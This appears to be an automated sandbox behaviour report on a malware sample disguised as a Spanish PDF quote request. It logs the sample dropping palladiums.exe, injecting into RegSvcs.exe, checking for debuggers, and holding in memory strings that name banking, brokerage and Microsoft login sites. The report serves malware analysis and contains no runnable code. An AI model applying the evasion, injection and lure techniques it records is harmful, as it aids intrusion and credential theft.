Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598921	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598154	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598046	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597937	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597622	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597515	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597296	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597187	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596968	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596859	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596750	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596640	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596531	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596422	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596312	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596093	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595869	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595750	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595640	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595530	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595421	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595258	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595093	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594945	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594718	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594605	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594047	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598233	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598122	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597468	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597250	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596921	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596482	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596047	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595937	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595718	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595609	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595390	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595172	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595062	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594843	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594731	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594625	Jump to behavior

Source: RegSvcs.exe, 00000007.00000002.4577761663.0000000004762000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: RegSvcs.exe, 00000007.00000002.4577761663.0000000004762000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: RegSvcs.exe, 00000007.00000002.4577761663.0000000004762000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: RegSvcs.exe, 00000007.00000002.4577761663.0000000004444000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: RegSvcs.exe, 00000007.00000002.4577761663.0000000004444000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: RegSvcs.exe, 00000007.00000002.4577761663.0000000004444000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: RegSvcs.exe, 00000007.00000002.4577761663.0000000004444000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: RegSvcs.exe, 00000007.00000002.4577761663.0000000004762000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: RegSvcs.exe, 00000007.00000002.4577761663.0000000004762000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: RegSvcs.exe, 00000007.00000002.4577761663.0000000004444000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: RegSvcs.exe, 00000007.00000002.4577761663.0000000004762000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: RegSvcs.exe, 00000007.00000002.4577761663.0000000004762000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: RegSvcs.exe, 00000007.00000002.4577761663.0000000004444000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: RegSvcs.exe, 00000007.00000002.4577761663.0000000004444000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: RegSvcs.exe, 00000007.00000002.4577761663.0000000004444000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: RegSvcs.exe, 00000007.00000002.4577761663.0000000004444000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: RegSvcs.exe, 00000007.00000002.4577761663.0000000004762000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: RegSvcs.exe, 00000007.00000002.4577761663.0000000004444000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: RegSvcs.exe, 00000007.00000002.4577761663.0000000004444000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: RegSvcs.exe, 00000007.00000002.4577761663.0000000004762000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: RegSvcs.exe, 00000007.00000002.4577761663.0000000004762000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: RegSvcs.exe, 00000007.00000002.4577761663.0000000004444000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: RegSvcs.exe, 00000007.00000002.4577761663.0000000004762000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: RegSvcs.exe, 00000007.00000002.4577761663.0000000004444000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: RegSvcs.exe, 00000007.00000002.4577761663.0000000004444000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: RegSvcs.exe, 00000007.00000002.4577761663.0000000004762000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: RegSvcs.exe, 00000007.00000002.4577761663.0000000004444000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: RegSvcs.exe, 00000007.00000002.4577761663.0000000004762000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: RegSvcs.exe, 00000007.00000002.4577761663.0000000004762000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: RegSvcs.exe, 00000007.00000002.4577761663.0000000004444000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: RegSvcs.exe, 00000007.00000002.4577761663.0000000004762000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: RegSvcs.exe, 00000007.00000002.4577761663.0000000004762000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: RegSvcs.exe, 00000007.00000002.4577761663.0000000004762000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: RegSvcs.exe, 00000007.00000002.4577761663.0000000004444000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: RegSvcs.exe, 00000007.00000002.4577761663.0000000004444000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: RegSvcs.exe, 00000007.00000002.4577761663.0000000004762000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: RegSvcs.exe, 00000007.00000002.4577761663.0000000004444000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: RegSvcs.exe, 00000007.00000002.4577761663.0000000004444000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: RegSvcs.exe, 00000007.00000002.4577761663.0000000004444000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: RegSvcs.exe, 00000007.00000002.4577761663.0000000004444000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: RegSvcs.exe, 00000007.00000002.4577761663.0000000004444000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: RegSvcs.exe, 00000007.00000002.4573384820.0000000001588000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: RegSvcs.exe, 00000007.00000002.4577761663.0000000004762000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: RegSvcs.exe, 00000007.00000002.4577761663.0000000004444000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: RegSvcs.exe, 00000007.00000002.4577761663.0000000004444000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: RegSvcs.exe, 00000007.00000002.4577761663.0000000004762000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: RegSvcs.exe, 00000007.00000002.4577761663.0000000004444000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: RegSvcs.exe, 00000007.00000002.4577761663.0000000004444000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: RegSvcs.exe, 00000007.00000002.4577761663.0000000004762000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: RegSvcs.exe, 00000003.00000002.4572627260.0000000000D07000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlly
Source: wscript.exe, 00000005.00000002.2285116072.000001ED4C8C5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: RegSvcs.exe, 00000007.00000002.4577761663.0000000004444000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: RegSvcs.exe, 00000007.00000002.4577761663.0000000004762000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: RegSvcs.exe, 00000007.00000002.4577761663.0000000004444000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: RegSvcs.exe, 00000007.00000002.4577761663.0000000004444000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: RegSvcs.exe, 00000007.00000002.4577761663.0000000004762000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: RegSvcs.exe, 00000007.00000002.4577761663.0000000004762000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: RegSvcs.exe, 00000007.00000002.4577761663.0000000004762000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: RegSvcs.exe, 00000007.00000002.4577761663.0000000004762000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: RegSvcs.exe, 00000007.00000002.4577761663.0000000004762000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: RegSvcs.exe, 00000007.00000002.4577761663.0000000004762000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: RegSvcs.exe, 00000007.00000002.4577761663.0000000004762000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: RegSvcs.exe, 00000007.00000002.4577761663.0000000004762000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: RegSvcs.exe, 00000007.00000002.4577761663.0000000004444000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: RegSvcs.exe, 00000007.00000002.4577761663.0000000004762000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 7_2_06B597B0 LdrInitializeThunk,

7_2_06B597B0

Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe

Code function: 0_2_0027EAA2 BlockInput,

0_2_0027EAA2

Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe

Code function: 0_2_00232622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00232622

Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe

Code function: 0_2_002042DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_002042DE

Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Code function: 0_2_00224CE8 mov eax, dword ptr fs:[00000030h]	0_2_00224CE8
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Code function: 0_2_017861C8 mov eax, dword ptr fs:[00000030h]	0_2_017861C8
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Code function: 0_2_01787838 mov eax, dword ptr fs:[00000030h]	0_2_01787838
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Code function: 0_2_01787898 mov eax, dword ptr fs:[00000030h]	0_2_01787898
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 2_2_00514CE8 mov eax, dword ptr fs:[00000030h]	2_2_00514CE8
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 2_2_01636030 mov eax, dword ptr fs:[00000030h]	2_2_01636030
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 2_2_01636090 mov eax, dword ptr fs:[00000030h]	2_2_01636090
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 2_2_016349C0 mov eax, dword ptr fs:[00000030h]	2_2_016349C0
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 6_2_00EBCDE8 mov eax, dword ptr fs:[00000030h]	6_2_00EBCDE8
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 6_2_00EBE458 mov eax, dword ptr fs:[00000030h]	6_2_00EBE458
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 6_2_00EBE4B8 mov eax, dword ptr fs:[00000030h]	6_2_00EBE4B8

Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe

Code function: 0_2_00260B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

0_2_00260B62

Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Code function: 0_2_00232622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00232622
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Code function: 0_2_0022083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0022083F
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Code function: 0_2_002209D5 SetUnhandledExceptionFilter,	0_2_002209D5
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Code function: 0_2_00220C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00220C21
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 2_2_00522622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00522622
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 2_2_0051083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_0051083F
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 2_2_005109D5 SetUnhandledExceptionFilter,	2_2_005109D5
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 2_2_00510C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00510C21

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write			Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 88C008			Jump to behavior
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1130008			Jump to behavior

Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe

0_2_00261201

Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe

Code function: 0_2_00242BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00242BA5

Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe

Code function: 0_2_0026B226 SendInput,keybd_event,

0_2_0026B226

Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe

Code function: 0_2_002822DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,

0_2_002822DA

